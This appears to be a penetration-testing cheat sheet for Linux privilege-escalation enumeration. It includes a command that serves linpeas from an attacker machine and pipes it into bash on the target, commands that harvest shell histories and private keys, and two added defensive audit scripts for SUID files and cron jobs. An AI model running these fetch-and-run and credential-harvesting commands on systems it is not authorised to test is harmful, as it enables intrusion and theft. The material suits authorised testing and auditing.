Linpeas#

Script that finds interesting things on Linux, potentially useful for privilege escalation.

# Download the script
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250301-c97fb02a/linpeas.sh
# Serve it over HTTP from the attacking machine
python -m http.server 8080
# Fetch and execute it on the target (the file served is linpeas.sh)
curl http://<local-ip>:8080/linpeas.sh | bash

Basic#

id
  • Any non-standard groups? Find files owned by them
find / -type f -group <group_name> 2>/dev/null
  • Shell history
history
cat ~/.bash_history
cat ~/.zsh_history
find / -type f \( -name '*_hist' -o -name '*_history' \) -ls 2>/dev/null
  • OS version
cat /etc/os-release
uname -r
cat /proc/version
sudo -V
  • List the current user's sudo privileges
sudo -l
  • Installed packages
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
ls /bin
  • SSH keys
ls -l ~/.ssh
  • All readable keys
grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null
  • /etc/passwd might contain password hashes, but that is very rare
cat /etc/passwd
  • SUID/SGID binaries and files with capabilities
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
getcap -r / 2>/dev/null
  • Who has a login shell (who to target)
grep 'sh$' /etc/passwd | awk -F: '{print $1}'
  • Who can use sudo?
getent group sudo
  • Find all writable directories
find / -writable -type d 2>/dev/null | grep -v '/home/<user>'
  • Environment variables
env
  • List the temp directories
ls -l /tmp /var/tmp /dev/shm
  • I don’t even know what it does, black magic
# dumps every process's command line; /proc/<pid>/cmdline separates arguments with NUL bytes
find /proc -maxdepth 2 -name cmdline -exec cat {} \; 2>/dev/null | tr '\0' '\n'
  • Ports
ss -tunl
netstat -tunl
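The SUID/SGID and writable-directory finds above are one-shot commands. Added example, not from this page or the PEASS-ng project: the same checks in POSIX sh as a baseline-and-diff audit, so a later run only reports binaries or directories that appeared since the baseline was taken. The function names are mine, and the root directory is a parameter (default /) so the functions can be run against any tree.

```shell
#!/bin/sh
# Added example (not part of the original page): baseline-and-diff audit of
# setuid/setgid files and world-writable directories. Function names are
# hypothetical; the root directory defaults to / but can be any tree.

# Setuid or setgid regular files under $1 (default /), sorted, one path per line.
suid_snapshot() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# World-writable directories under $1 (default /) that lack the sticky bit:
# anyone can delete or replace other users' files in such a directory.
loose_dir_snapshot() {
    find "${1:-/}" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null | sort
}

# Lines present in a fresh snapshot but absent from a saved (sorted) baseline file.
# $1 = snapshot function name, $2 = baseline file, $3 = root directory.
new_since_baseline() {
    "$1" "$3" | comm -13 "$2" -
}

# Stand-alone use: save a baseline once, compare against it later.
#   suid_snapshot / > suid.baseline
#   new_since_baseline suid_snapshot suid.baseline /
```

`comm` needs both inputs sorted, which is why every snapshot is piped through `sort` before it is saved or compared; a freshly appeared setuid binary or an unsticky world-writable directory is the kind of change worth investigating first.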

Processes#

Processes run by root#

ps aux | grep root

Running processes#

ps au

pspy#

GitHub page: https://github.com/DominicBreuker/pspy

To monitor processes without root.

Download the binary and transfer it to the target machine

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Then just run it

# -p prints commands, -f prints file system events, -i sets the procfs scan interval in ms
./pspy64 -pf -i 1000

Crontab#

cat /etc/crontab
ls -la /etc/cron.daily/
crontab -l
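Added example, not from this page: a POSIX sh audit of a system crontab that reports jobs whose program file is group- or other-writable, which is the misconfiguration these three commands are looking for. The function names and the parsing of the /etc/crontab layout (`min hour dom mon dow user command`, plus `@reboot`-style entries) are mine; per-user crontabs from `crontab -l` have no user field and are not handled.

```shell
#!/bin/sh
# Added example (not part of the original page): flag cron jobs whose program
# can be modified by group members or by everyone. Function names are hypothetical.

# Print "gw", "ow", "gw,ow" or "-" for group/other write permission on a path.
# Returns 1 when the path does not exist.
loose_write_bits() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    [ -n "$mode" ] || return 1
    out=""
    [ "$(printf '%s' "$mode" | cut -c6)" = "w" ] && out="gw"
    [ "$(printf '%s' "$mode" | cut -c9)" = "w" ] && out="${out:+$out,}ow"
    printf '%s\n' "${out:--}"
}

# Read a system crontab ($1) and print "<user> <program> <bits>" for each job whose
# program is group- or other-writable. Comments, blank lines and VAR=value lines
# are skipped; programs that do not exist on this host are skipped too.
cron_loose_jobs() {
    while IFS= read -r line || [ -n "$line" ]; do
        set -f                 # no globbing: schedule fields contain '*'
        set -- $line
        set +f
        [ $# -gt 0 ] || continue
        case $1 in
            '#'*|*=*) continue ;;        # comment or environment assignment
            @*) user=$2; prog=$3 ;;      # @reboot / @daily style entry
            *)  user=$6; prog=$7 ;;      # min hour dom mon dow user command
        esac
        [ -n "$prog" ] || continue
        bits=$(loose_write_bits "$prog") || continue
        if [ "$bits" != "-" ]; then
            printf '%s %s %s\n' "$user" "$prog" "$bits"
        fi
    done < "$1"
}

# Stand-alone use:
#   cron_loose_jobs /etc/crontab
#   for f in /etc/cron.d/*; do cron_loose_jobs "$f"; done
```

Only the first word of the command is examined, so a job that runs `sh /path/script.sh` is reported on `sh`, not on the script; extending the parser to look at the first argument when the program is an interpreter is the obvious next step.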

Disks#

lsblk
cat /etc/fstab

Logged in users#

lastlog

Yeah, just w

w